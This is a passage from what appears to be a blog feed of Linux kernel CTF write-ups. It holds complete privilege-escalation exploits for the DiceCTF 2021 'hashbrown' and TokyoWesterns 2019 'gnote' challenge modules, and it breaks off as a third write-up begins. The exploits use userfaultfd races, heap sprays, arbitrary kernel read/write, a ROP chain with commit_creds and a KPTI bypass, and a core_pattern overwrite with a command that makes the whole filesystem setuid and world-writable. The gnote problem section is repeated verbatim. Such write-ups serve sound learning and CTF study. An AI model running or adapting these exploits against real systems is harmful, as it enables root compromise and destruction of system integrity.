&lt;sys/syscall.h&gt; #include &lt;unistd.h&gt; static void get_enter_to_continue(const char* msg); static void fatal(const char* msg); static int register_uffd(void* addr, size_t len, void* (*handler)(void*)); static void get_enter_to_continue(const char* msg) { puts(msg); getchar(); } static void fatal(const char* msg) { perror(msg); // get_enter_to_continue(&#34;Press enter to exit...&#34;); exit(-1); } static int register_uffd(void* addr, size_t len, void* (*handler)(void*)) { struct uffdio_api uffdio_api; struct uffdio_register uffdio_register; pthread_t th; int uffd = syscall(__NR_userfaultfd, __O_CLOEXEC | O_NONBLOCK); if (uffd &lt; 0) { fatal(&#34;syscall(__NR_userfaultfd)&#34;); } uffdio_api.api = UFFD_API; uffdio_api.features = 0; if (ioctl(uffd, UFFDIO_API, &amp;uffdio_api) &lt; 0) { fatal(&#34;ioctl(UFFDIO_API)&#34;); } uffdio_register.range.start = (uint64_t)addr; uffdio_register.range.len = len; uffdio_register.mode = UFFDIO_REGISTER_MODE_MISSING; if (ioctl(uffd, UFFDIO_REGISTER, &amp;uffdio_register) &lt; 0) { fatal(&#34;ioctl(UFFDIO_REGISTER)&#34;); } if (pthread_create(&amp;th, NULL, handler, (void*)(uint64_t)uffd) &lt; 0) { fatal(&#34;pthread_create&#34;); } return uffd; } #define VULN_DEV_NAME &#34;hashbrown&#34; #define VULN_DEV_CMD_ADD_KEY 0x1337 #define VULN_DEV_CMD_DELETE_KEY 0x1338 #define VULN_DEV_CMD_UPDATE_VALUE 0x1339 #define VULN_DEV_CMD_DELETE_VALUE 0x133a #define VULN_DEV_CMD_GET_VALUE 0x133b #define VULN_DEV_CONST_SIZE_ARR_START 0x10 #define VULN_DEV_CONST_SIZE_ARR_MAX 0x200 #define VULN_DEV_CONST_MAX_ENTRIES 0x400 #define VULN_DEV_CONST_MAX_VALUE_SIZE 0xb0 #define VULN_DEV_GET_THRESHOLD(size) (size - (size &gt;&gt; 2)) #define VULN_DEV_RESULT_INVALID 1 #define VULN_DEV_RESULT_EXISTS 2 #define VULN_DEV_RESULT_NOT_EXISTS 3 #define VULN_DEV_RESULT_MAXED 4 typedef struct { uint32_t key; uint32_t size; char* src; char* dest; } request_t; static int vuln_dev_add_key(uint32_t key, void* src, uint32_t size); static int vuln_dev_delete_key(uint32_t key); static int vuln_dev_update_value(uint32_t key, void* src, uint32_t size); static int vuln_dev_delete_value(uint32_t key); static int vuln_dev_get_value(uint32_t key, void* out, uint32_t size); static uint32_t get_hash_idx_from_key(uint32_t key, uint32_t size); static void calculate_hash_collision(uint32_t* out, size_t out_size, uint32_t hash, uint32_t size); int vuln_fd = 0; static int vuln_dev_add_key(uint32_t key, void* src, uint32_t size) { request_t req = {.key = key, .size = size, .src = (char*)src, .dest = NULL}; return ioctl(vuln_fd, VULN_DEV_CMD_ADD_KEY, &amp;req); } static int vuln_dev_delete_key(uint32_t key) { request_t req = {.key = key, .size = 0, .src = NULL, .dest = NULL}; return ioctl(vuln_fd, VULN_DEV_CMD_DELETE_KEY, &amp;req); } static int vuln_dev_update_value(uint32_t key, void* src, uint32_t size) { request_t req = {.key = key, .size = size, .src = (char*)src, .dest = NULL}; return ioctl(vuln_fd, VULN_DEV_CMD_UPDATE_VALUE, &amp;req); } static int vuln_dev_delete_value(uint32_t key) { request_t req = {.key = key, .size = 0, .src = NULL, .dest = NULL}; return ioctl(vuln_fd, VULN_DEV_CMD_DELETE_VALUE, &amp;req); } static int vuln_dev_get_value(uint32_t key, void* dest, uint32_t size) { request_t req = {.key = key, .size = size, .src = NULL, .dest = (char*)dest}; return ioctl(vuln_fd, VULN_DEV_CMD_GET_VALUE, &amp;req); } static uint32_t get_hash_idx_from_key(uint32_t key, uint32_t size) { uint32_t hash; key ^= (key &gt;&gt; 20) ^ (key &gt;&gt; 12); hash = key ^ (key &gt;&gt; 7) ^ (key &gt;&gt; 4); return hash &amp; (size - 1); } static void calculate_hash_collision(uint32_t* out, size_t out_size, uint32_t hash, uint32_t size) { if (hash &gt;= size) { fatal(&#34;calculate_hash_collision: hash &gt;= size&#34;); } uint32_t* p = out; const uint32_t* const last_p = p + out_size; for (uint32_t cur_key = 0; cur_key &lt;= 0xffffffff; ++cur_key) { const uint32_t cur_hash = get_hash_idx_from_key(cur_key, size); if (cur_hash != hash) { continue; } *p++ = cur_key; if (p == last_p) { break; } } } #define KERNEL_BASE_START 0xffffffff81000000 #define KERNEL_BASE_END 0xffffffffc0000000 #define IS_IN_KERNEL_BASE_RANGE(x) \ (KERNEL_BASE_START &lt;= (x) &amp;&amp; (x) &lt;= KERNEL_BASE_END) #define KERNEL_MODULE_START 0xffffffffc0000000 #define KERNEL_MODPROBE_OFFSET (0xa46fe0) #define KERNEL_CORE_PATTERN_OFFSET (0xb0cd00) #define KERNEL_START_SYMTAB_OFFSET (0x990940) #define KERNEL_MODULE_HASHMAP_OFFSET (0x2540) static void entry_spray(uint32_t idx, void* data, size_t size); static void* pthread_entry_spray(void* arg); static uint64_t construct_corrupted_entry(); static uint64_t leak_heap_address(); static void aar(void* out, uint64_t addr, size_t size); static void aaw(uint64_t addr, void* data, size_t size); static uint64_t aar64(uint64_t addr); static void aaw64(uint64_t addr, uint64_t val); static uint64_t find_kernel_address(uint64_t heap_addr); static uint64_t find_module_base(); static uint64_t find_core_pattern_address(uint64_t kernel_addr); static void entry_spray(uint32_t idx, void* data, size_t size) { uint32_t keys[512]; calculate_hash_collision(keys, 512, idx, VULN_DEV_CONST_SIZE_ARR_MAX); for (int i = 0; i &lt; 512; ++i) { vuln_dev_add_key(keys[i], data, size); } } static void* pthread_entry_spray(void* arg) { uint32_t idx = *(uint32_t*)(arg); void* data = (void*)*(uint64_t*)(arg + 8); size_t size = *(size_t*)(arg + 16); uint32_t keys[512]; entry_spray(idx, data, size); } cpu_set_t target_cpu; uint32_t collision_keys[VULN_DEV_CONST_SIZE_ARR_MAX]; static void* userfault_handler_for_construct_fake_entry(void* args) { int uffd = (int)(long)args; char* page = (char*)mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); if (page == MAP_FAILED) { fatal(&#34;userfault_handler_for_construct_fake_entry: mmap&#34;); } static struct uffd_msg msg; struct uffdio_copy copy; struct pollfd pollfd; // puts( // &#34;[*] userfault_handler_for_construct_fake_entry: waiting for page &#34; // &#34;fault...&#34;); pollfd.fd = uffd; pollfd.events = POLLIN; while (poll(&amp;pollfd, 1, -1) &gt; 0) { if (pollfd.revents &amp; POLLERR || pollfd.revents &amp; POLLHUP) { fatal(&#34;userfault_handler_for_construct_fake_entry: poll&#34;); } if (read(uffd, &amp;msg, sizeof(msg)) &lt;= 0) { fatal(&#34;userfault_handler_for_construct_fake_entry: read(uffd)&#34;); } if (msg.event != UFFD_EVENT_PAGEFAULT) { fatal( &#34;userfault_handler_for_construct_fake_entry: msg.event != &#34; &#34;UFFD_EVENT_PAGEFAULT&#34;); } // printf( // &#34;[*] userfault_handler_for_construct_fake_entry: addr=0x%llx, &#34; // &#34;flag=0x%llx\n&#34;, // msg.arg.pagefault.address, msg.arg.pagefault.flags); // Main Routine puts(&#34;[+] UFFD: Deleting values...&#34;); uint32_t cur_size = VULN_DEV_CONST_SIZE_ARR_MAX / 2; uint32_t cur_threshold = VULN_DEV_GET_THRESHOLD(cur_size); for (int i = 0; i &lt;= cur_threshold + 1; ++i) { vuln_dev_delete_value(collision_keys[i]); } copy.src = (uint64_t)page; // data of page will be data of faulted page copy.dst = (uint64_t)msg.arg.pagefault.address; copy.len = 0x1000; copy.mode = 0; copy.copy = 0; if (ioctl(uffd, UFFDIO_COPY, &amp;copy) &lt; 0) { fatal(&#34;userfault_handler_for_construct_fake_entry: ioctl(UFFDIO_COPY)&#34;); } break; } munmap(page, 0x1000); return NULL; } static uint64_t construct_corrupted_entry() { char data[0x20]; uint64_t* uint64_data = (uint64_t*)data; memset(data, &#39;a&#39;, 0x20); uint32_t target_idx = 0; uint32_t cur_size = VULN_DEV_CONST_SIZE_ARR_MAX / 2; uint32_t cur_threshold = VULN_DEV_GET_THRESHOLD(cur_size); calculate_hash_collision(collision_keys, 512, target_idx, VULN_DEV_CONST_SIZE_ARR_MAX); puts(&#34;[*] Adding keys...&#34;); for (int i = 0; i &lt; cur_threshold; ++i) { vuln_dev_add_key(collision_keys[i], data, sizeof(data)); } void* uffd_page = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); int uffd = register_uffd(uffd_page, 0x1000, userfault_handler_for_construct_fake_entry); puts(&#34;[*] Trigger `resize` and deleting values...&#34;); vuln_dev_add_key(collision_keys[cur_threshold + 1], uffd_page, sizeof(data)); puts(&#34;[*] Spraying entries...&#34;); { entry_spray(1, data, 0x20); pthread_t th; uint64_t arg[3] = {2, (uint64_t)data, 0x20}; pthread_create(&amp;th, NULL, pthread_entry_spray, arg); pthread_join(th, NULL); } puts(&#34;[*] Checking there is a corrupted entry...&#34;); uint64_t entry_key = -1, backing_key = -1; for (int i = 0; i &lt;= cur_threshold + 1; ++i) { uint32_t cur_key = collision_keys[i]; vuln_dev_get_value(collision_keys[i], data, 0x20); if (*uint64_data == 0x6161616161616161 || (*uint64_data &gt;&gt; 32) != 0x20) { continue; } entry_key = cur_key; backing_key = (*uint64_data) &amp; 0xffffffff; break; } close(uffd); munmap(uffd_page, 0x1000); return (entry_key &lt;&lt; 32) | backing_key; } uint32_t controller_key, backing_key; uint64_t original_backing_ptr; static uint64_t leak_heap_address() { char data[0x20]; uint64_t* uint64_data = (uint64_t*)data; vuln_dev_get_value(controller_key, data, 0x20); return uint64_data[1]; } static void aar(void* dest, uint64_t addr, size_t size) { char data[0x20]; uint64_t* uint64_data = (uint64_t*)data; uint64_data[0] = ((size &amp; 0xffffffff) &lt;&lt; 32) | backing_key; uint64_data[1] = addr; vuln_dev_update_value(controller_key, data, 0x10); vuln_dev_get_value(backing_key, dest, size); } static void aaw(uint64_t addr, void* src, size_t size) { char data[0x20]; uint64_t* uint64_data = (uint64_t*)data; uint64_data[0] = ((size &amp; 0xffffffff) &lt;&lt; 32) | backing_key; uint64_data[1] = addr; vuln_dev_update_value(controller_key, data, 0x10); vuln_dev_update_value(backing_key, src, size); } static uint64_t aar64(uint64_t addr) { uint64_t val = -1; aar(&amp;val, addr, 8); return val; } static void aaw64(uint64_t addr, uint64_t val) { return aaw(addr, &amp;val, 8); } static uint64_t find_kernel_address(uint64_t heap_addr) { char data[0x1000]; uint64_t* uint64_data = (uint64_t*)data; int sprays[0x1000]; for (int i = 0; i &lt; 0x1000; ++i) { sprays[i] = open(&#34;/proc/self/stat&#34;, O_RDONLY); } uint64_t addr = heap_addr - 0x8000; uint64_t ret = -1; while (addr &lt;= heap_addr + 0x8000) { uint64_t val = aar64(addr); if (IS_IN_KERNEL_BASE_RANGE(val)) { ret = val; break; } addr += 8; } for (int i = 0; i &lt; 0x1000; ++i) { close(sprays[i]); } return ret; } static uint64_t find_module_base() { uint64_t addr = KERNEL_MODULE_START; while (addr &lt;= KERNEL_MODULE_START + 0x10000 * 0x1000) { uint64_t val = aar64(addr); if (val != -1) { return addr; } addr += 0x1000; } } static uint64_t find_core_pattern_address(uint64_t kernel_addr) { char data[0x20]; uint64_t maybe_kernel_base = kernel_addr &amp; ~0xfffff; uint64_t maybe_core_pattern_addr = maybe_kernel_base + KERNEL_CORE_PATTERN_OFFSET; uint64_t core_pattern_addr = -1; while (core_pattern_addr == -1) { aar(data, maybe_core_pattern_addr, 0x20); if (!strcmp(data, &#34;core&#34;)) { core_pattern_addr = maybe_core_pattern_addr; } maybe_core_pattern_addr -= 0x100000; } return core_pattern_addr; } int main() { vuln_fd = open(&#34;/dev/&#34; VULN_DEV_NAME, O_RDONLY); if (vuln_fd &lt; 0) { fatal(&#34;open(/dev/&#34; VULN_DEV_NAME &#34;)&#34;); } uint64_t entry_key_and_backing_key = construct_corrupted_entry(); controller_key = entry_key_and_backing_key &gt;&gt; 32; backing_key = entry_key_and_backing_key &amp; 0xffffffff; original_backing_ptr = leak_heap_address(); printf( &#34;[+] Find corrupted entry! (controller_key=0x%08x, &#34; &#34;backing_key=0x%08x; backing_ptr=0x%016lx)\n&#34;, controller_key, backing_key, original_backing_ptr); uint64_t kernel_address = find_kernel_address(original_backing_ptr); printf(&#34;[+] kernel_address(not base): 0x%016lx\n&#34;, kernel_address); uint64_t module_base = find_module_base(); printf(&#34;[+] module_base: 0x%016lx\n&#34;, module_base); uint64_t core_pattern_address = find_core_pattern_address(kernel_address); printf(&#34;[+] core_pattern_address: 0x%016lx\n&#34;, core_pattern_address); uint64_t kernel_base = core_pattern_address - KERNEL_CORE_PATTERN_OFFSET; printf(&#34;[+] kernel_base: 0x%016lx\n&#34;, kernel_base); char new_core_pattern[] = &#34;|/bin/chmod 6777 -R /&#34;; printf(&#34;[*] Overwrite core_pattern to \&#34;%s\&#34;...\n&#34;, new_core_pattern); aaw(core_pattern_address, new_core_pattern, sizeof(new_core_pattern)); puts(&#34;[*] Trigger core_pattern...&#34;); uint64_t* evil = (uint64_t*)0xdeadbeefcafebebe; *evil = 0; return 0; }</code></pre></div> <h2 id="reference">Reference</h2> <ul> <li><a href="https://gitlab.com/sajjadium/ctf-archives/-/tree/main/ctfs/DiceCTF/2021/pwn/hashbrown">https://gitlab.com/sajjadium/ctf-archives/-/tree/main/ctfs/DiceCTF/2021/pwn/hashbrown</a></li> </ul> /posts/kernel/write-ups/ctf/tokyowesternsctf2019-gnote/ Thu, 30 Jan 2025 14:39:40 +0000 /posts/kernel/write-ups/ctf/tokyowesternsctf2019-gnote/ <hr> <h2 id="problem">Problem</h2> <h3 id="environment">Environment</h3> <ul> <li>linux version: <code>4.19.65</code></li> <li>mmap_min_addr: <code>0x1000</code></li> <li>No SMAP</li> </ul> <h3 id="module">Module</h3> <div class="collapsable-code"> <input id="738214659" type="checkbox" checked /> <label for="738214659"> <span class="collapsable-code__language">c</span> <span class="collapsable-code__title">TokyoWesternsCTF2019-gnote-features.c</span> <span class="collapsable-code__toggle" data-label-expand="Show" data-label-collapse="Hide"></span> </label> <pre class="language-c" > <code>typedef struct request_t { uint32_t cmd; uint32_t arg; } request_t; int64_t gnote_write(struct file *a1, const request_t *req, size_t a3, loff_t *a4) { uint64_t len; note_data_t *req; void *new_note_data; mutex_lock(&amp;lock); switch (req-&gt;cmd) { case 1: if ((uint64_t)cnt &lt;= 7) { len = (uint32_t)req-&gt;arg; cur_note = &amp;notes[cnt]; cur_note-&gt;len = len; if (len &lt;= 0x10000) { new_note_data = kmalloc(len, 0x6000C0LL); ++cnt; cur_note-&gt;data = new_note_data; } } break; case 2: printk(&#34;Edit Not implemented\n&#34;); break; case 3: printk(&#34;Delete Not implemented\n&#34;); break; case 4: printk(&#34;Copy Not implemented\n&#34;); break; case 5: if ((uint32_t)req-&gt;arg &lt; (uint64_t)cnt) selected = (uint32_t)req-&gt;arg; break; default: break; } mutex_unlock(&amp;lock); return a3; } uint64_t gnote_read(struct file *a1, char *a2, size_t len, loff_t *a4) { note_data_t *cur_note; mutex_lock(&amp;lock); if (selected == -1) { mutex_unlock(&amp;lock); return 0LL; } else { cur_note = &amp;notes[selected]; if (cur_note-&gt;len &lt;= len) len = cur_note-&gt;len; copy_to_user(a2, cur_note-&gt;data, len); selected = -1LL; mutex_unlock(&amp;lock); return len; } }</code></pre></div> <p>The gnote module has just 3 features: add new note, select note and get note&rsquo;s content. But with these features, we cannot write content to note (Edit is not implemented&hellip;).</p> <hr> <h2 id="problem">Problem</h2> <h3 id="environment">Environment</h3> <ul> <li>linux version: <code>4.19.65</code></li> <li>mmap_min_addr: <code>0x1000</code></li> <li>No SMAP</li> </ul> <h3 id="module">Module</h3> <div class="collapsable-code"> <input id="738214659" type="checkbox" checked /> <label for="738214659"> <span class="collapsable-code__language">c</span> <span class="collapsable-code__title">TokyoWesternsCTF2019-gnote-features.c</span> <span class="collapsable-code__toggle" data-label-expand="Show" data-label-collapse="Hide"></span> </label> <pre class="language-c" > <code>typedef struct request_t { uint32_t cmd; uint32_t arg; } request_t; int64_t gnote_write(struct file *a1, const request_t *req, size_t a3, loff_t *a4) { uint64_t len; note_data_t *req; void *new_note_data; mutex_lock(&amp;lock); switch (req-&gt;cmd) { case 1: if ((uint64_t)cnt &lt;= 7) { len = (uint32_t)req-&gt;arg; cur_note = &amp;notes[cnt]; cur_note-&gt;len = len; if (len &lt;= 0x10000) { new_note_data = kmalloc(len, 0x6000C0LL); ++cnt; cur_note-&gt;data = new_note_data; } } break; case 2: printk(&#34;Edit Not implemented\n&#34;); break; case 3: printk(&#34;Delete Not implemented\n&#34;); break; case 4: printk(&#34;Copy Not implemented\n&#34;); break; case 5: if ((uint32_t)req-&gt;arg &lt; (uint64_t)cnt) selected = (uint32_t)req-&gt;arg; break; default: break; } mutex_unlock(&amp;lock); return a3; } uint64_t gnote_read(struct file *a1, char *a2, size_t len, loff_t *a4) { note_data_t *cur_note; mutex_lock(&amp;lock); if (selected == -1) { mutex_unlock(&amp;lock); return 0LL; } else { cur_note = &amp;notes[selected]; if (cur_note-&gt;len &lt;= len) len = cur_note-&gt;len; copy_to_user(a2, cur_note-&gt;data, len); selected = -1LL; mutex_unlock(&amp;lock); return len; } }</code></pre></div> <p>The gnote module has just 3 features: add new note, select note and get note&rsquo;s content. But with these features, we cannot write content to note (Edit is not implemented&hellip;).</p> <h3 id="vulnerability">Vulnerability</h3> <p>There are two vulnerabilities. First is uninitialized heap and second is double fetch bug in switch statement.</p> <h4 id="uninitialized-heap">Uninitialized heap</h4> <p>When we add note, because the module just use <code>kmalloc</code> (note that <code>kmalloc</code> does not clear its data), we can get the previous content of allocated chunk. Therefore if the chunk was used to store vtable and the address of vtable is not cleared by SLUB or other object, we can get it.</p> <h4 id="double-fetch-in-switch-statement">Double fetch in switch statement</h4> <p>I think this is main bug of this challenge. As we know, sometimes switch statement use jump table for a speed (optimization). And the switch statement of <code>gnote_write</code> is implemented by jump table. But, its index (key) is obtained in user space:</p> <pre tabindex="0"><code class="language-assembly" data-lang="assembly">gnote_write: ; ... mov rbx, rsi; rsi is const request_t __user *buf mov r12, rdx call mutex_lock cmp dword ptr [rbx], 5 ; rbx is const request_t __user *buf ja short DEFAULT_CASE mov eax, [rbx] mov rax, JUMP_TABLE[rax*8]; == mov rax, QWORD PTR [rax*8 - off] where 0x3fffef68 &lt;= off &lt;= 0x3effff68 jmp __x86_indirect_thunk_rax ; ... </code></pre><p>The index (key) is double-fetched from user by <code>cmp dword ptr [rbx], 5</code> and <code>mov eax, [rbx]</code>. So if <code>[rbx]</code> is smaller or equal than 5 when executeing <code>cmp dword ptr [rbx], 5</code> and set <code>[rbx]</code> to other value before <code>mov eax, [rbx]</code>, we can use relatively arbitrary address like jump table.</p> <h2 id="exploit">Exploit</h2> <h3 id="leak-kernel-base">Leak kernel base</h3> <p>I explained above, we can leak kernel base using uninitialized heap chunk. For leaking kernel base, I use heap spray with &ldquo;/dev/ptmx&rdquo; (tty_struct) (see <code>leak_kernel_base</code> function).</p> <h3 id="exploit-switch__x86_indirect_thunk_rax-using-double-fetch">Exploit switch(__x86_indirect_thunk_rax) using double fetch</h3> <p>We can write a code which cause crash because of invalid jump table index (key) (see <code>jump_at_jump_table_idx</code>, <code>race1</code> and <code>race2</code>). However&hellip; there is not useful address in (ro)data segment of module&hellip;</p> <p>I could not find the way to exploit double fetch. So I just look the assembly instructions of switch statements:</p> <pre tabindex="0"><code class="language-assembly" data-lang="assembly">gnote_write: ; ... mov eax, [rbx] mov rax, JUMP_TABLE[rax*8]; == mov rax, QWORD PTR [rax*8 - off] where 0x3fffef68 &lt;= off &lt;= 0x3effff68 jmp __x86_indirect_thunk_rax ; ... </code></pre><p>Do you notice it? the target address of jump table is calulated by <code>key*8 - off</code> and <code>off</code> is changed depending on base address of module (<code>off = -(module_base + 0x1098)</code>). Let&rsquo;s consider <code>off</code> is 0x3fffef68 (this means <code>module_base</code> is 0xffffffffc0000000). In this assumption if <code>rax</code>, index (key) of jump table, is 0x7fffded, <code>key*8 - off</code> is 0!! So, we can access address 0 and use it as jump table!!</p> <p>In given environment, SMAP is disabled. Therefore we can use stack pivoting with mmaped page with <code>MAP_FIEXED | MAP_POPULATE</code>. Since mmap_min_addr is 0x1000 and the minimum key for non-negative result is 0x3fffef68, I think <code>0x200 + 0x7fffded</code> is best for a fixed key.</p> <h3 id="exploit-code">Exploit code</h3> <p>Because we cannot mmap with size = 0x1000000, I mmap with size = 0x400000. So, the success rate of this exploit code is 25%.</p> <div class="collapsable-code"> <input id="794152863" type="checkbox" checked /> <label for="794152863"> <span class="collapsable-code__language">c</span> <span class="collapsable-code__title">TokyoWesternsCTF2019-gnote-exploit.c</span> <span class="collapsable-code__toggle" data-label-expand="Show" data-label-collapse="Hide"></span> </label> <pre class="language-c" > <code>#define _GNU_SOURCE #include &lt;fcntl.h&gt; #include &lt;pthread.h&gt; #include &lt;sched.h&gt; #include &lt;stdint.h&gt; #include &lt;stdio.h&gt; #include &lt;stdlib.h&gt; #include &lt;sys/mman.h&gt; #include &lt;unistd.h&gt; #define VULN_DEV_WRITE_CMD_ADD 1 #define VULN_DEV_WRITE_CMD_SELECT 5 #define VULN_DEV_WRITE_CMD_MAX 6 #define VULN_DEV_MAX_NOTE_COUNT 8 #define VULN_DEV_RELATIVE_IDX_OF_NOTES_TO_JUMP_TABLE 0x26d #define FAKE_JUMP_TABLE_ADDR ((void*)0x1000) #define FAKE_JUMP_TABLE_SIZE 0x400000 #define FAKE_STACK_ADDR ((void*)0x5d000000) #define FAKE_STACK_SIZE 0x6000 #define FAKE_RSP (FAKE_STACK_ADDR + 5) #define KERNEL_BASE_START 0xffffffff81000000 #define KERNEL_BASE_END 0xffffffffc0000000 #define IS_KERNEL_BASE(x) \ ((KERNEL_BASE_START &lt;= (x)) &amp;&amp; ((x) &lt;= KERNEL_BASE_END)) #define TTY_STRUCT_OPS_OFFSET (0xffffffff81a35260 - KERNEL_BASE_START) #define MOV_ESP_0x5d000005_OFFSET (0xffffffff811f2bba - KERNEL_BASE_START) #define POP_RDI_OFFSET (0xffffffff8101c20d - KERNEL_BASE_START) #define PREPARE_KERNEL_CRED_OFFSET (0xffffffff81069fe0 - KERNEL_BASE_START) #define POP_RCX_OFFSET (0xffffffff81037523 - KERNEL_BASE_START) #define MOV_RDI_RAX_REQ_MOV_RDI_RSI_POP_RBP_OFFSET \ (0xffffffff81018eef - KERNEL_BASE_START) #define COMMIT_CREDS_OFFSET (0xffffffff81069df0 - KERNEL_BASE_START) #define BYPASS_KPTI_OFFSET (0xffffffff81600a4a - KERNEL_BASE_START) void get_enter_to_continue(const char* msg) { puts(msg); getchar(); } void fatal(const char* msg) { perror(msg); // get_enter_to_continue(&#34;Press enter to exit...&#34;); exit(-1); } uint64_t user_cs, user_ss, user_sp, user_rflags; static void save_state() { asm(&#34;mov %[u_cs], cs;\n&#34; &#34;mov %[u_ss], ss;\n&#34; &#34;mov %[u_sp], rsp;\n&#34; &#34;pushf;\n&#34; &#34;pop %[u_rflags];\n&#34; : [u_cs] &#34;=r&#34;(user_cs), [u_ss] &#34;=r&#34;(user_ss), [u_sp] &#34;=r&#34;(user_sp), [u_rflags] &#34;=r&#34;(user_rflags)::&#34;memory&#34;); printf( &#34;[*] user_cs: 0x%lx, user_ss: 0x%lx, user_sp: 0x%lx, user_rflags: &#34; &#34;0x%lx\n&#34;, user_cs, user_ss, user_sp, user_rflags); } static void get_shell() { puts(&#34;[+] Get shell!&#34;); char* argv[] = {&#34;/bin/sh&#34;, NULL}; char* envp[] = {NULL}; execve(&#34;/bin/sh&#34;, argv, envp); } typedef struct request_t { uint32_t cmd; uint32_t arg; } request_t; int vuln_fd; int vuln_dev_added_count = 0; void vuln_dev_add(uint64_t size) { ++vuln_dev_added_count; request_t req = {.cmd = VULN_DEV_WRITE_CMD_ADD, .arg = size}; write(vuln_fd, &amp;req, sizeof(req)); } void vuln_dev_select(uint64_t idx) { request_t req = {.cmd = VULN_DEV_WRITE_CMD_SELECT, .arg = idx}; write(vuln_fd, &amp;req, sizeof(req)); } void* page_buf; request_t* page_req; cpu_set_t cpus[2]; uint64_t leak_kernel_base() { for (int cur_try = 0; cur_try &lt;= VULN_DEV_MAX_NOTE_COUNT; ++cur_try) { int spray_fds[0x10]; const int spray_obj_size = 0x2e0; const int spray_obj_count = sizeof(spray_fds) / sizeof(int); const int middle_idx = spray_obj_count / 2; for (int i = 0; i &lt; spray_obj_count; ++i) { spray_fds[i] = open(&#34;/dev/ptmx&#34;, O_NOCTTY | O_RDONLY); } for (int i = 0; i &lt; middle_idx; ++i) { close(spray_fds[i]); } vuln_dev_add(spray_obj_size); for (int i = middle_idx; i &lt; spray_obj_count; ++i) { close(spray_fds[i]); } vuln_dev_select(cur_try); read(vuln_fd, page_buf, spray_obj_size); uint64_t maybe_tty_struct_ops = *(uint64_t*)(page_buf + 0x18); uint64_t maybe_kbase = maybe_tty_struct_ops - TTY_STRUCT_OPS_OFFSET; if ((maybe_kbase &amp; 0xfffff) == 0 &amp;&amp; IS_KERNEL_BASE(maybe_kbase)) { return maybe_kbase; } } return (uint64_t)-1; } int do_race = 0; int jump_table_idx; void* race1(void* arg) { if (sched_setaffinity(0, sizeof(cpu_set_t), arg)) { fatal(&#34;sched_setaffinity&#34;); } while (do_race) { page_req-&gt;cmd = VULN_DEV_WRITE_CMD_SELECT; } } void* race2(void* arg) { if (sched_setaffinity(0, sizeof(cpu_set_t), arg)) { fatal(&#34;sched_setaffinity&#34;); } const uint64_t const_jump_table_idx = jump_table_idx; while (do_race) { page_req-&gt;cmd = const_jump_table_idx; } } void jump_at_jump_table_idx() { pthread_t th1; pthread_create(&amp;th1, NULL, race1, &amp;cpus[1]); pthread_t th2; pthread_create(&amp;th2, NULL, race2, &amp;cpus[1]); do_race = 1; page_req-&gt;arg = 0; while (1) { page_req-&gt;cmd = VULN_DEV_WRITE_CMD_SELECT; write(vuln_fd, page_buf, 0x1000); } } int main() { for (int i = 0; i &lt; 2; ++i) { CPU_ZERO(&amp;cpus[i]); CPU_SET(i, &amp;cpus[i]); } if (sched_setaffinity(0, sizeof(cpu_set_t), &amp;cpus[0])) { fatal(&#34;sched_setaffinity&#34;); } save_state(); vuln_fd = open(&#34;/proc/gnote&#34;, O_RDWR); if (vuln_fd &lt; 0) { fatal(&#34;open(/proc/gnote)&#34;); } page_buf = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); if (page_buf == MAP_FAILED) { fatal(&#34;mmap&#34;); } page_req = (request_t*)page_buf; printf(&#34;[*] page_buf addr: %p\n&#34;, page_buf); uint64_t kernel_base = leak_kernel_base(); printf(&#34;[+] kernel_base: 0x%016lx\n&#34;, kernel_base); void* fake_jump_table = mmap(FAKE_JUMP_TABLE_ADDR, FAKE_JUMP_TABLE_SIZE, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED | MAP_POPULATE, -1, 0); if (fake_jump_table == MAP_FAILED) { fatal(&#34;mmap&#34;); } for (uint64_t* cur = fake_jump_table; (void*)cur &lt; fake_jump_table + FAKE_JUMP_TABLE_SIZE; ++cur) { *cur = kernel_base + MOV_ESP_0x5d000005_OFFSET; } printf(&#34;[*] fake_jump_table addr: %p\n&#34;, fake_jump_table); void* fake_stack = mmap(FAKE_STACK_ADDR - FAKE_STACK_SIZE / 2, FAKE_STACK_SIZE, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED | MAP_POPULATE, -1, 0); if (fake_stack == MAP_FAILED) { fatal(&#34;mmap&#34;); } printf(&#34;[*] fake_stack addr: %p\n&#34;, fake_stack); printf(&#34;[*] Build ROP Chain @ %p...\n&#34;, fake_stack); uint64_t* rop_buf = FAKE_RSP; *rop_buf++ = kernel_base + POP_RDI_OFFSET; *rop_buf++ = 0; *rop_buf++ = kernel_base + PREPARE_KERNEL_CRED_OFFSET; *rop_buf++ = kernel_base + POP_RCX_OFFSET; *rop_buf++ = 0; *rop_buf++ = kernel_base + MOV_RDI_RAX_REQ_MOV_RDI_RSI_POP_RBP_OFFSET; *rop_buf++ = 0xdeadbeefcafebe00; *rop_buf++ = kernel_base + COMMIT_CREDS_OFFSET; *rop_buf++ = kernel_base + BYPASS_KPTI_OFFSET; *rop_buf++ = 0xdeadbeefcafebe01; *rop_buf++ = 0xdeadbeefcafebe02; *rop_buf++ = (uint64_t)(get_shell); // user_rip *rop_buf++ = (uint64_t)(user_cs); *rop_buf++ = (uint64_t)(user_rflags); *rop_buf++ = (uint64_t)(user_sp); *rop_buf++ = (uint64_t)(user_ss); jump_table_idx = 0x200 + 0x7fffded; printf(&#34;[*] jump_table_idx: 0x%08x\n&#34;, jump_table_idx); puts(&#34;[*] Do race condition attack at jump table used in switch...&#34;); jump_at_jump_table_idx(); close(vuln_fd); return 0; }</code></pre></div> <h2 id="reference">Reference</h2> <ul> <li><a href="https://gitlab.com/sajjadium/ctf-archives/-/tree/main/ctfs/TokyoWesterns/2019/gnote">https://gitlab.com/sajjadium/ctf-archives/-/tree/main/ctfs/TokyoWesterns/2019/gnote</a></li> </ul> /posts/kernel/write-ups/ctf/tokyowesternsctf2020-eebpf/ Tue, 28 Jan 2025 11:21:15 +0000 /posts/kernel/write-ups/ctf/tokyowesternsctf2020-eebpf/ <hr> <h2 id="problem">Problem</h2> <h3 id="environment">Environment</h3> <ul> <li>kernel version: <code>5.4.58</code></li> <li>unprivileged_bpf_disabled: <code>0</code></li> </ul> <h3 id="patch-file">Patch file</h3> <p>The important part is following:</p> <div class="collapsable-code"> <input id="594782631" type="checkbox" /> <label 